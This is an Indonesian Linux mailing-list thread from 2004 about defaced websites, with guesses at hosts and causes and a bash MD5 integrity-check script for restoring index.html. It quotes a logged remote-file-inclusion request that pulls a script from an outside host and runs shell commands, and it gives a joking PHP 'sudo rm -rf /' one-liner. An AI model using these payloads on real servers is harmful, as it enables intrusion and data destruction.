Re: [tanya-jawab] situs2 yang di hack
Senin, 15/03/04 9:07:11, Rio menulis: RM Bisa diberikan contoh gimana setting cronnya? saya belum pernah RM coba sebelumnya .. thx b4 Koq jadi ditanggapin serius yak? Itu ndak serius, alias becanda. Mosok tiap menit ngecek index.html, apa gak ada kerjaan lain? :-) Gak koq .. itu ide yang bagus .. Untuk site sebesar Detik.Com dsb nya .. yang diakses per detik sekian ip untuk halaman depannya saja. Bila sampe dihack / dideface, reputasi bakalan jatuh. Btw itu ide yang bagus loh. Mungkin tidak semenit sekali ceknya. Mungkin 30 menit sekali atau sejam sekali. Minta donk contoh real si script cron nya bagaimana .. kalau boleh .. (: Halo, Ikutan nimbrung. Saya lebih cenderung pake digest kayak MD5 atau SHA1 untuk ngecheck daripada cuma ngecheck modify timestamp aja. Modify timestamp gampang dirubah pake touch -m Skrip ini saya tulis di FreeBSD, nama program md5-nya 'md5'. Kalo nggak salah di Linux (Redhat), namanya 'md5sum'. Variable DIGEST perlu diganti. Metode seperti ini beranggapan kalo servernya nggak kena root accountnya. Kalo attacker dapat root... reformat dan reinstall :-) --- #!/usr/local/bin/bash DIGEST=md5 PRODUKSI=/var/www/html/index.html BACKUP=/home/backup/index.html PROD_DIGEST=`$DIGEST $PRODUKSI | awk -F= '{print $2}' -` BACK_DIGEST=`$DIGEST $BACKUP | awk -F= '{print $2}' -` if test $PROD_DIGEST == $BACK_DIGEST; then echo OK else echo DEFACED cp $BACKUP $PRODUKSI fi Salam, Andrew... Thanks - Rio.Martin - -- Unsubscribe: kirim email kosong ke [EMAIL PROTECTED] Arsip dan info di http://linux.or.id/milis.php FAQ milis http://linux.or.id/faq.php
Re: [tanya-jawab] situs2 yang di hack
On Mon, Mar 15, 2004 at 05:36:56PM +0700, Mpu Gondrong wrote: Senin, 15/03/04 9:07:11, Rio menulis: RM Bisa diberikan contoh gimana setting cronnya? saya belum pernah RM coba sebelumnya .. thx b4 Koq jadi ditanggapin serius yak? Itu ndak serius, alias becanda. Mosok tiap menit ngecek index.html, apa gak ada kerjaan lain? :-) Saya mencoba script berikut, untuk mengecek halaman MovableType+MT RSS Feed, untuk mengecek waktu update index.html-nya. Update rss feed di index.html dilakukan oleh cron (misal tiap satu jam), sehingga saya perlu mengecek juga apakah sudah uptodate rss yang saya sedot ituh;-) ?php /* File Last Modified by Mark Woodward (August, 2003) http://cowpi.com/journal/templates/ This function returns a ISO formatted last modified date for a given filename. */ function FileLastModified($filename) { // returns a formatted last modified date $dateStr = (file_exists($filename)) ? date(r, filemtime($filename)) : ''; return $dateStr; } ? ? /* Use this piece of code within the body of your HTML document to display the last modified date for a file. If file is within a different directory, its path will have to be included. */ ? ?php echo FileLastModified('index.html'); ? Tapi ini hanya bisa dipake dengan halaman web pribadi anda. Mengenai cron, jika dicek setiap menit, bukankah mailbox anda akan penuh? Bagaimana bila menggunakan AIDE? -- Program Diploma Teknik Elektro Universitas Gadjah Mada Yogyakarta gpg-key: http://te.pdft.ugm.ac.id/~jaya/jaya.gpg Key fingerprint = 8F89 C7CF 0B0C 27F2 4F64 9DED DB5F E088 079E C5E4 -- Unsubscribe: kirim email kosong ke [EMAIL PROTECTED] Arsip dan info di http://linux.or.id/milis.php FAQ milis http://linux.or.id/faq.php
Re: [tanya-jawab] situs2 yang di hack
On Monday 15 March 2004 17:36, Mpu Gondrong wrote: Senin, 15/03/04 9:07:11, Rio menulis: RM Bisa diberikan contoh gimana setting cronnya? saya belum pernah RM coba sebelumnya .. thx b4 Koq jadi ditanggapin serius yak? Itu ndak serius, alias becanda. Mosok tiap menit ngecek index.html, apa gak ada kerjaan lain? :-) Gak koq .. itu ide yang bagus .. Untuk site sebesar Detik.Com dsb nya .. yang diakses per detik sekian ip untuk halaman depannya saja. Bila sampe dihack / dideface, reputasi bakalan jatuh. Btw itu ide yang bagus loh. Mungkin tidak semenit sekali ceknya. Mungkin 30 menit sekali atau sejam sekali. Minta donk contoh real si script cron nya bagaimana .. kalau boleh .. (: Thanks - Rio.Martin - -- Unsubscribe: kirim email kosong ke [EMAIL PROTECTED] Arsip dan info di http://linux.or.id/milis.php FAQ milis http://linux.or.id/faq.php
Re: [tanya-jawab] situs2 yang di hack
Oeban Poetih wrote: rekans, kalo saya baca di buku web hacking (terbitan andi) karya stuart mcclure, shaumil shah dan sheeraj shah, kebanyakan situs bisa di-hack dari hasil eksploitasi dari script yang dibuat oleh si pembuat websitenya. jarang sekali langsung ditembus ke mesinnya. CMIIW. Salam, Oeban Poetih. On Friday 12 March 2004 19:09, lordsanjay wrote: hehehe, nggak kok, saya gak maksud panasin toh yang disalahkan kan admin nya, ini tanggung jawabnya sepertinya sih script nya yang bermasalah, mungkin punya akses write di directory web nya tul tuh, setelah eksploitasi skrip (input validation attack), kan bisa menjalankan prentah lewat browser, atau prentahnya dijadwal aja dengan prentah at syaratnya ya kita harus punya akses write ke folder tertentu (yg telah di-compromise) untuk meletakkan file tertentu juga. :-) -- Iko Riyadi Departemen Data Manajemen PT. Infomedia Nusantara Jl. Kusuma Bangsa 10-12 Surabaya 60272 Telp: (031) 5326282, Fax: (031) 5343613 http://www.yellowpages.co.id -- Unsubscribe: kirim email kosong ke [EMAIL PROTECTED] Arsip dan info di http://linux.or.id/milis.php FAQ milis http://linux.or.id/faq.php
Re: [tanya-jawab] situs2 yang di hack
On Sunday 14 March 2004 04:14, Mpu Gondrong wrote: 13/03/2004 14:04:32, Rio menulis: RM Kalau write tanpa eksekusi shell mungkin menyulitkan intruder RM berbuat banyak. Tapi kalau Eksekusi Shell bisa dilakukan, itu RM sangat luar biasa. Karena dia bisa read, write .. Lho, PHP khan punya akses ke segalanya, termasuk shell. Bikin saja skrip '? system('sudo rm -rf /'); ?', kali aja nobody dibolehkan sudo tanpa password mengeksekusi rm. Sudah coba di slackware sama mandrake latest, tidak bisa secara default (: RM Backup = setting sama, daemon sama, hole sama .. Hackernya RM sama, tinggal dihack dan di-deface lagi .. Tinggal bikin aja cron yg ngecek tiap menit apakah index.html berubah, kalo iya copy lagi dari backup. :-) Bisa diberikan contoh gimana setting cronnya? saya belum pernah coba sebelumnya .. thx b4 - Rio.Martin - -- Unsubscribe: kirim email kosong ke [EMAIL PROTECTED] Arsip dan info di http://linux.or.id/milis.php FAQ milis http://linux.or.id/faq.php
Re: [tanya-jawab] situs2 yang di hack
On Sunday 14 March 2004 04:28, Mpu Gondrong wrote: 13/03/2004 8:36:54, M. menulis: MP Kayaknya yang mungkin dimasalahin bukan backup deh. Tapi mungkin MP lebih kemasalah reputasi. Itu yang saya tau loo CMIIW Dlm segi keamanan, kita tidak bisa mengukur gimana lawan kita, tapi kita bisa mengukur gimana kemampuan kita. Backup adl salah satu cara menunjukkan bahwa kita adl admin yg bertanggung jawab. Apalagi bila sistem bisa pulih 100% dlm waktu yg tidak lama, itu pasti admin jempolan. Tentu saja, keamanan adl proses yg terus menerus, jadi selalu perlu dievaluasi. Termasuk bila misalnya servernya raib digondol maling, siapa bisa tahu? kalau sampai server raib digondol maling, yang mesti di-patch ya si security gedung nya. (: - Rio.Martin - -- Unsubscribe: kirim email kosong ke [EMAIL PROTECTED] Arsip dan info di http://linux.or.id/milis.php FAQ milis http://linux.or.id/faq.php
Re: [tanya-jawab] situs2 yang di hack
Hello Romie, Sunday, March 14, 2004, 1:26:23 PM, you wrote: On Saturday 13 March 2004 17:04, Rio Martin wrote: Daripada penasaran semua, ini saya coba buka sedikit dari kejadian yang belum lama menyentuh server teman saya. Thanks untuk Whaone atas log nya Log dari HTTP: 202.155.70.242 - - [26/Feb/2004:04:53:21 +0700] GET /main.php?cont=http://develbox.bhc.or.id/~pupet/pupetcahyo=cd%20/var/tmp%2 0;%20cat%20cahyo.txt HTTP/1.0 200 4552 Rupaya si IP 202.155.70.242 mencoba - coba keampuhan scriptnya, sayang sekali dia mencoba - coba ke destination yang salah dan sedikit agak ceroboh tidak mengcover IP nya. Mungkin saja ip warnet .. who knows .. Kalau diliat dari ipnya itu adalah ip dari langganan cable personal indosat. Mungkin kamu bisa coba kirim email ke [EMAIL PROTECTED] Atau bisa langsung telp ke 78546800 (CS Corporate). Aku pernah ada kejadian seperti ini dan langsung di respon sama mereka. :) -- Best regards, Romie Djapri ohh PUPET, ck..ck..ck.. udah tua masih mainan gini, sadar oi, sadar! Nyoman. #nobody is perfect, i am nobody :p -- Unsubscribe: kirim email kosong ke [EMAIL PROTECTED] Arsip dan info di http://linux.or.id/milis.php FAQ milis http://linux.or.id/faq.php
Re: [tanya-jawab] situs2 yang di hack
--- blog [EMAIL PROTECTED] wrote: apa skrg situs nya masih di hack sampe skg masih tampilan defaced. mungkin yg punya nggak tau ama hosternya nggak tau juga. dyno salam http://www.batukaru.com - Original Message - From: William [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Saturday, March 13, 2004 9:18 AM Subject: Re: [tanya-jawab] situs2 yang di hack Menariknya di antihackerlink.org ini pada bisa post komentar. Setelah diliat HTML nya lagi, skrip PHP nya berlokasi di situs lain. Pas di whois, informasinya lengkap lagi. Kemungkinan besar si empunya situs ini korban juga. Atau sama kayak diatas, informasi whois-nya pada ngawur. Ralat. Maap. Situs yg dimaksud www.doneeh.com memang menyediakan jasa untuk post komentar. dyno -- Unsubscribe: kirim email kosong ke [EMAIL PROTECTED] Arsip dan info di http://linux.or.id/milis.php FAQ milis http://linux.or.id/faq.php __ Do you Yahoo!? Yahoo! Mail - More reliable, more storage, less spam http://mail.yahoo.com -- Unsubscribe: kirim email kosong ke [EMAIL PROTECTED] Arsip dan info di http://linux.or.id/milis.php FAQ milis http://linux.or.id/faq.php
Re: [tanya-jawab] situs2 yang di hack
rekans, kalo saya baca di buku web hacking (terbitan andi) karya stuart mcclure, shaumil shah dan sheeraj shah, kebanyakan situs bisa di-hack dari hasil eksploitasi dari script yang dibuat oleh si pembuat websitenya. jarang sekali langsung ditembus ke mesinnya. CMIIW. Salam, Oeban Poetih. On Friday 12 March 2004 19:09, lordsanjay wrote: hehehe, nggak kok, saya gak maksud panasin toh yang disalahkan kan admin nya, ini tanggung jawabnya sepertinya sih script nya yang bermasalah, mungkin punya akses write di directory web nya -- Unsubscribe: kirim email kosong ke [EMAIL PROTECTED] Arsip dan info di http://linux.or.id/milis.php FAQ milis http://linux.or.id/faq.php
Re: [tanya-jawab] situs2 yang di hack
--- Rio Martin [EMAIL PROTECTED] wrote: On Saturday 13 March 2004 01:17, Bloody Good wrote: On Fri, Mar 12, 2004 at 07:00:00PM +0700, lordsanjay wrote: sampang.net and www.lenkom.net.id di host di apenta.com. Ini berdasarkan nameserver yg biasanya cukup ok untuk identifikasi hoster nya. Dan dilihat dari IP bloknya yg seblok juga apenta.com. Mas2 di apenta.com, 2 pelanggan anda kena hack. Gue nyaranin tutup juga tuh anonymous FTP nya kalo nggak perlu. Jadi si intruder masuk lewat FTP yah? cukup hebat saya bilang kalau dia tembusnya dari FTP. Sebab FTP yang di Linux pake ProFTPD sedangkan di Windows pake bawaannya si IIS. Kalau masuknya lewat web gimana ? ooops.. gue nggak bilang masuknya lewat ftp. ntar kena flame dari proftpd users :) Gue cuma bilang kalo anonymous ftp itu potensi trouble. Gue liat sendiri log file server gue byk banget yg coba anonymous ftp padahal kitanya juga nggak pernah advertise kalo ada anon ftp. Dari modelnya kitanya kena scan, mungkin pake robot yg nyecan IP addresses lalu nyoba anon ftp. Kan juga nggak perlu ngasih anon ftp access kalo nggak diperlukan. Hackernya minim bisa upload index file sendiri. Upload file mungkin aja lewat ftp, scp/sftp, applikasi PHP, atau FrontPage extension. Dan nggak tau kenapa begitu denger frontpage extension, bulu kuduk jadi berdiri ;) dyno (: Gimana hackernya nyikat, nggak tau juga detailnya. Moga2 mas2 di apenta.com bisa sharing2 hasil forensiknya biar kita2 pada bisa bikin Linux lebih aman. Semoga bisa dishare .. (: - Rio.Martin - -- Unsubscribe: kirim email kosong ke [EMAIL PROTECTED] Arsip dan info di http://linux.or.id/milis.php FAQ milis http://linux.or.id/faq.php __ Do you Yahoo!? Yahoo! Mail - More reliable, more storage, less spam http://mail.yahoo.com -- Unsubscribe: kirim email kosong ke [EMAIL PROTECTED] Arsip dan info di http://linux.or.id/milis.php FAQ milis http://linux.or.id/faq.php
Re: [tanya-jawab] situs2 yang di hack
On Saturday 13 March 2004 16:14, Bloody Good wrote: --- Rio Martin [EMAIL PROTECTED] wrote: On Saturday 13 March 2004 01:17, Bloody Good wrote: On Fri, Mar 12, 2004 at 07:00:00PM +0700, lordsanjay wrote: sampang.net and www.lenkom.net.id di host di apenta.com. Ini berdasarkan nameserver yg biasanya cukup ok untuk identifikasi hoster nya. Dan dilihat dari IP bloknya yg seblok juga apenta.com. Mas2 di apenta.com, 2 pelanggan anda kena hack. Gue nyaranin tutup juga tuh anonymous FTP nya kalo nggak perlu. Jadi si intruder masuk lewat FTP yah? cukup hebat saya bilang kalau dia tembusnya dari FTP. Sebab FTP yang di Linux pake ProFTPD sedangkan di Windows pake bawaannya si IIS. Kalau masuknya lewat web gimana ? ooops.. gue nggak bilang masuknya lewat ftp. ntar kena flame dari proftpd users :) Gue cuma bilang kalo anonymous ftp itu potensi trouble. Gue liat sendiri log file server gue byk banget yg coba anonymous ftp padahal kitanya juga nggak pernah advertise kalo ada anon ftp. Dari modelnya kitanya kena scan, mungkin pake robot yg nyecan IP addresses lalu nyoba anon ftp. Kan juga nggak perlu ngasih anon ftp access kalo nggak diperlukan. Hackernya minim bisa upload index file sendiri. Upload file mungkin aja lewat ftp, scp/sftp, applikasi PHP, atau FrontPage extension. Dan nggak tau kenapa begitu denger frontpage extension, bulu kuduk jadi berdiri ;) Daripada penasaran semua, ini saya coba buka sedikit dari kejadian yang belum lama menyentuh server teman saya. Thanks untuk Whaone atas log nya Log dari HTTP: 202.155.70.242 - - [26/Feb/2004:04:53:21 +0700] GET /main.php?cont=http://develbox.bhc.or.id/~pupet/pupetcahyo=cd%20/var/tmp%20;%20cat%20cahyo.txt HTTP/1.0 200 4552 Rupaya si IP 202.155.70.242 mencoba - coba keampuhan scriptnya, sayang sekali dia mencoba - coba ke destination yang salah dan sedikit agak ceroboh tidak mengcover IP nya. Mungkin saja ip warnet .. who knows .. Nah contohnya seperti itu diatas. Oh ya sengaja saya buka ini ke public, sebab saya capek nungguin tanggapan abuse nya Indosatnet, kagak respon. Berhati-hatilah rekan2 sekalian, periksa dan teliti script PHP , ASP pada website. Barangkali saja memang ada hole yang belum ditutup. Untuk yang melakukan dari ip 202.155.70.242, saya cuma titip pesan Better Luck Next Time .. (: - Rio.Martin - -- Unsubscribe: kirim email kosong ke [EMAIL PROTECTED] Arsip dan info di http://linux.or.id/milis.php FAQ milis http://linux.or.id/faq.php
Re: [tanya-jawab] situs2 yang di hack
On Saturday 13 March 2004 17:04, Rio Martin wrote: Daripada penasaran semua, ini saya coba buka sedikit dari kejadian yang belum lama menyentuh server teman saya. Thanks untuk Whaone atas log nya Log dari HTTP: 202.155.70.242 - - [26/Feb/2004:04:53:21 +0700] GET /main.php?cont=http://develbox.bhc.or.id/~pupet/pupetcahyo=cd%20/var/tmp%2 0;%20cat%20cahyo.txt HTTP/1.0 200 4552 Rupaya si IP 202.155.70.242 mencoba - coba keampuhan scriptnya, sayang sekali dia mencoba - coba ke destination yang salah dan sedikit agak ceroboh tidak mengcover IP nya. Mungkin saja ip warnet .. who knows .. Kalau diliat dari ipnya itu adalah ip dari langganan cable personal indosat. Mungkin kamu bisa coba kirim email ke [EMAIL PROTECTED] Atau bisa langsung telp ke 78546800 (CS Corporate). Aku pernah ada kejadian seperti ini dan langsung di respon sama mereka. :) -- Best regards, Romie Djapri -- Unsubscribe: kirim email kosong ke [EMAIL PROTECTED] Arsip dan info di http://linux.or.id/milis.php FAQ milis http://linux.or.id/faq.php
Re: [tanya-jawab] situs2 yang di hack
On Friday 12 March 2004 18:06, lordsanjay wrote: Hi, tau situs situs yang di hack kan? (tv7, trans tv, sampang.net dll) bukan masalah hack nya yang di persoalkan tapi ada yg tau OS nya apa gak yang di hack? lordsanjay concern juga yah ? kalau selidik punya selidik sih: [EMAIL PROTECTED] root]# telnet www.transtv.co.id 80 Trying 202.95.128.53... Connected to hiu.pesat.net.id (202.95.128.53). TransTV hosting di Hiu.Pesat.Net.Id terus yang Sampang.Net kalau gak salah pake HOSTNOC di US. Hebat sekali kalau dia bisa hack dari admin yang rajin ngepatch. Kecurigaan saya sih tetap pada script yang ada di web. Pasti kemarin itu ada yang dimanfaatkan, mungkin pada script PHP atau ASP nya. (: - Rio.Martin - -- Unsubscribe: kirim email kosong ke [EMAIL PROTECTED] Arsip dan info di http://linux.or.id/milis.php FAQ milis http://linux.or.id/faq.php
Re: [tanya-jawab] situs2 yang di hack
On Friday 12 March 2004 19:00, lordsanjay wrote: Kalo dari netcraft (www.netcraft.com) dibilang The site www.transtv.co.id is running Microsoft-IIS/5.0 on Windows 2000 The site www.tv7.co.id is running Microsoft-IIS/5.0 on Windows 2000 The site www.bengkulu.go.id is running Microsoft-IIS/5.0 on Windows 2000 The site www.sampang.net is running Apache/1.3.27 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.2 PHP/4.3.2 FrontPage/5.0.2.2510 mod_ssl/2.8.14 OpenSSL/0.9.6b on Linux The site www.lenkom.co.id is running Apache on Linux wah, 3:2 nih =) Oooo .. dilihat dari OS nya tho .. Lordsanjay: jangan dilihat dari OS nya, ntar bisa bikin panas lagi .. (: Lihat dari sisi mana dia bisa masuk .. - Rio.Martin - -- Unsubscribe: kirim email kosong ke [EMAIL PROTECTED] Arsip dan info di http://linux.or.id/milis.php FAQ milis http://linux.or.id/faq.php
RE: [tanya-jawab] situs2 yang di hack
hehehe, nggak kok, saya gak maksud panasin toh yang disalahkan kan admin nya, ini tanggung jawabnya sepertinya sih script nya yang bermasalah, mungkin punya akses write di directory web nya lordsanjay -Original Message- From: Rio Martin [mailto:[EMAIL PROTECTED] Sent: Friday, March 12, 2004 7:06 PM To: [EMAIL PROTECTED] Subject: Re: [tanya-jawab] situs2 yang di hack On Friday 12 March 2004 19:00, lordsanjay wrote: Kalo dari netcraft (www.netcraft.com) dibilang The site www.transtv.co.id is running Microsoft-IIS/5.0 on Windows 2000 The site www.tv7.co.id is running Microsoft-IIS/5.0 on Windows 2000 The site www.bengkulu.go.id is running Microsoft-IIS/5.0 on Windows 2000 The site www.sampang.net is running Apache/1.3.27 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.2 PHP/4.3.2 FrontPage/5.0.2.2510 mod_ssl/2.8.14 OpenSSL/0.9.6b on Linux The site www.lenkom.co.id is running Apache on Linux wah, 3:2 nih =) Oooo .. dilihat dari OS nya tho .. Lordsanjay: jangan dilihat dari OS nya, ntar bisa bikin panas lagi .. (: Lihat dari sisi mana dia bisa masuk .. - Rio.Martin - -- Unsubscribe: kirim email kosong ke [EMAIL PROTECTED] Arsip dan info di http://linux.or.id/milis.php FAQ milis http://linux.or.id/faq.php -- Unsubscribe: kirim email kosong ke [EMAIL PROTECTED] Arsip dan info di http://linux.or.id/milis.php FAQ milis http://linux.or.id/faq.php
Re: [tanya-jawab] situs2 yang di hack
On Fri, 12 Mar 2004 19:00:00 +0700, lordsanjay [EMAIL PROTECTED] wrote: Kalo dari netcraft (www.netcraft.com) dibilang The site www.transtv.co.id is running Microsoft-IIS/5.0 on Windows 2000 The site www.tv7.co.id is running Microsoft-IIS/5.0 on Windows 2000 The site www.bengkulu.go.id is running Microsoft-IIS/5.0 on Windows 2000 The site www.sampang.net is running Apache/1.3.27 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.2 PHP/4.3.2 FrontPage/5.0.2.2510 mod_ssl/2.8.14 OpenSSL/0.9.6b on Linux The site www.lenkom.co.id is running Apache on Linux 2 site ini di-host di burst.net burst.net...what's up ??? wah, 3:2 nih =) lordsanjay kenapa kalo di refresh...dia ke antihackerlink.org dulu ??? -Original Message- From: Rio Martin [mailto:[EMAIL PROTECTED] Sent: Friday, March 12, 2004 6:29 PM To: [EMAIL PROTECTED] Subject: Re: [tanya-jawab] situs2 yang di hack On Friday 12 March 2004 18:06, lordsanjay wrote: Hi, tau situs situs yang di hack kan? (tv7, trans tv, sampang.net dll) bukan masalah hack nya yang di persoalkan tapi ada yg tau OS nya apa gak yang di hack? lordsanjay concern juga yah ? kalau selidik punya selidik sih: [EMAIL PROTECTED] root]# telnet www.transtv.co.id 80 Trying 202.95.128.53... Connected to hiu.pesat.net.id (202.95.128.53). TransTV hosting di Hiu.Pesat.Net.Id terus yang Sampang.Net kalau gak salah pake HOSTNOC di US. Hebat sekali kalau dia bisa hack dari admin yang rajin ngepatch. Kecurigaan saya sih tetap pada script yang ada di web. Pasti kemarin itu ada yang dimanfaatkan, mungkin pada script PHP atau ASP nya. (: - Rio.Martin - -- Unsubscribe: kirim email kosong ke [EMAIL PROTECTED] Arsip dan info di http://linux.or.id/milis.php FAQ milis http://linux.or.id/faq.php
Re: [tanya-jawab] situs2 yang di hack
On 12-Mar-2004, Rio Martin wrote: On Friday 12 March 2004 18:06, lordsanjay wrote: tau situs situs yang di hack kan? (tv7, trans tv, sampang.net dll) bukan masalah hack nya yang di persoalkan tapi ada yg tau OS nya apa gak yang di hack? concern juga yah ? kalau selidik punya selidik sih: [EMAIL PROTECTED] root]# telnet www.transtv.co.id 80 Trying 202.95.128.53... Connected to hiu.pesat.net.id (202.95.128.53). Ini sebelum atau sesudah dibenerin? Tau dari mana kalo dia gak ganti mesin atau ganti OS atau ganti ISP? Ronny -- Unsubscribe: kirim email kosong ke [EMAIL PROTECTED] Arsip dan info di http://linux.or.id/milis.php FAQ milis http://linux.or.id/faq.php
Re: [tanya-jawab] situs2 yang di hack
On Fri, Mar 12, 2004 at 07:00:00PM +0700, lordsanjay wrote: Kalo dari netcraft (www.netcraft.com) dibilang The site www.transtv.co.id is running Microsoft-IIS/5.0 on Windows 2000 The site www.tv7.co.id is running Microsoft-IIS/5.0 on Windows 2000 The site www.bengkulu.go.id is running Microsoft-IIS/5.0 on Windows 2000 Kalo yg ini no-comment dech! The site www.sampang.net is running Apache/1.3.27 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.2 PHP/4.3.2 FrontPage/5.0.2.2510 mod_ssl/2.8.14 OpenSSL/0.9.6b on Linux The site www.lenkom.co.id is running Apache on Linux Gue comment untuk yg dua ini karena menyangkut Linux. Kalo ditelusuri lewat HTML, DNS dan Whois, sepertinya banyak juga korban dari hacking ini. sampang.net and www.lenkom.net.id di host di apenta.com. Ini berdasarkan nameserver yg biasanya cukup ok untuk identifikasi hoster nya. Dan dilihat dari IP bloknya yg seblok juga apenta.com. Mas2 di apenta.com, 2 pelanggan anda kena hack. Gue nyaranin tutup juga tuh anonymous FTP nya kalo nggak perlu. Setelah diliat di HTML nya, isinya frame yg ngarah ke antihackerlink.org. Menurut whois yg punya orang Australia dengan nama bule segala. Tapi bisa jadi ini identifikasi palsu. Menariknya di antihackerlink.org ini pada bisa post komentar. Setelah diliat HTML nya lagi, skrip PHP nya berlokasi di situs lain. Pas di whois, informasinya lengkap lagi. Kemungkinan besar si empunya situs ini korban juga. Atau sama kayak diatas, informasi whois-nya pada ngawur. Gimana hackernya nyikat, nggak tau juga detailnya. Moga2 mas2 di apenta.com bisa sharing2 hasil forensiknya biar kita2 pada bisa bikin Linux lebih aman. wah, 3:2 nih =) Kesalahan mungkin aja bukan di sysadmin atau system. Bisa jadi end-user kena social engineering lalu ngasih tau username/password ke hacker. Kalo methode hackingnya seperti ini biar seaman apapun systemnya dan sepinter apapun sysadminya, bakal bobol juga. dyno lordsanjay __ Do you Yahoo!? Yahoo! Search - Find what youre looking for faster http://search.yahoo.com -- Unsubscribe: kirim email kosong ke [EMAIL PROTECTED] Arsip dan info di http://linux.or.id/milis.php FAQ milis http://linux.or.id/faq.php
Re: [tanya-jawab] situs2 yang di hack
Menariknya di antihackerlink.org ini pada bisa post komentar. Setelah diliat HTML nya lagi, skrip PHP nya berlokasi di situs lain. Pas di whois, informasinya lengkap lagi. Kemungkinan besar si empunya situs ini korban juga. Atau sama kayak diatas, informasi whois-nya pada ngawur. Ralat. Maap. Situs yg dimaksud www.doneeh.com memang menyediakan jasa untuk post komentar. dyno Gimana hackernya nyikat, nggak tau juga detailnya. Moga2 mas2 di apenta.com bisa sharing2 hasil forensiknya biar kita2 pada bisa bikin Linux lebih aman. wah, 3:2 nih =) Kesalahan mungkin aja bukan di sysadmin atau system. Bisa jadi end-user kena social engineering lalu ngasih tau username/password ke hacker. Kalo methode hackingnya seperti ini biar seaman apapun systemnya dan sepinter apapun sysadminya, bakal bobol juga. dyno hacking website bisa juga merupakan salah satu alat marketing untuk mempopulerkan sebuah website. sebab sebuah site setelah di hack akan banyak dikunjungi dan diberitakan dimana-mana. intinya adalah seperti taktik perang Sun Tzu. padahal kerugian hack tidak sebanding dengan besarnya keuntungan yg diperoleh. -- Unsubscribe: kirim email kosong ke [EMAIL PROTECTED] Arsip dan info di http://linux.or.id/milis.php FAQ milis http://linux.or.id/faq.php
Re: [tanya-jawab] situs2 yang di hack
apa skrg situs nya masih di hack salam http://www.batukaru.com - Original Message - From: William [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Saturday, March 13, 2004 9:18 AM Subject: Re: [tanya-jawab] situs2 yang di hack Menariknya di antihackerlink.org ini pada bisa post komentar. Setelah diliat HTML nya lagi, skrip PHP nya berlokasi di situs lain. Pas di whois, informasinya lengkap lagi. Kemungkinan besar si empunya situs ini korban juga. Atau sama kayak diatas, informasi whois-nya pada ngawur. Ralat. Maap. Situs yg dimaksud www.doneeh.com memang menyediakan jasa untuk post komentar. dyno -- Unsubscribe: kirim email kosong ke [EMAIL PROTECTED] Arsip dan info di http://linux.or.id/milis.php FAQ milis http://linux.or.id/faq.php
Re: [tanya-jawab] situs2 yang di hack
On Friday 12 March 2004 21:47, Ronny Haryanto wrote: On 12-Mar-2004, Rio Martin wrote: On Friday 12 March 2004 18:06, lordsanjay wrote: tau situs situs yang di hack kan? (tv7, trans tv, sampang.net dll) bukan masalah hack nya yang di persoalkan tapi ada yg tau OS nya apa gak yang di hack? concern juga yah ? kalau selidik punya selidik sih: [EMAIL PROTECTED] root]# telnet www.transtv.co.id 80 Trying 202.95.128.53... Connected to hiu.pesat.net.id (202.95.128.53). Ini sebelum atau sesudah dibenerin? Tau dari mana kalo dia gak ganti mesin atau ganti OS atau ganti ISP? Ronny Kayaknya ngetest yang bagus dan tepat adalah waktu tampilannya masih tampilan defaced site. (: - Rio.Martin - -- Unsubscribe: kirim email kosong ke [EMAIL PROTECTED] Arsip dan info di http://linux.or.id/milis.php FAQ milis http://linux.or.id/faq.php
Re: [tanya-jawab] situs2 yang di hack
On Friday 12 March 2004 21:22, Mpu Gondrong wrote: Jumat, 12/03/04 19:09:56, lordsanjay menulis: l hehehe, nggak kok, saya gak maksud panasin l toh yang disalahkan kan admin nya, ini tanggung jawabnya Tinggal copy lagi dari backup, gitu aja koq repot. Kalo gak punya backup, itu baru repot. Btw, denger berita ini dari mana? Backup = setting sama, daemon sama, hole sama .. Hackernya sama, tinggal dihack dan di-deface lagi .. (: - Rio.Martin - -- Unsubscribe: kirim email kosong ke [EMAIL PROTECTED] Arsip dan info di http://linux.or.id/milis.php FAQ milis http://linux.or.id/faq.php
Re: [tanya-jawab] situs2 yang di hack
On Friday 12 March 2004 19:09, lordsanjay wrote: hehehe, nggak kok, saya gak maksud panasin toh yang disalahkan kan admin nya, ini tanggung jawabnya sepertinya sih script nya yang bermasalah, mungkin punya akses write di directory web nya CMIIW, Kalau write tanpa eksekusi shell mungkin menyulitkan intruder berbuat banyak. Tapi kalau Eksekusi Shell bisa dilakukan, itu sangat luar biasa. Karena dia bisa read, write .. - Rio.Martin - -- Unsubscribe: kirim email kosong ke [EMAIL PROTECTED] Arsip dan info di http://linux.or.id/milis.php FAQ milis http://linux.or.id/faq.php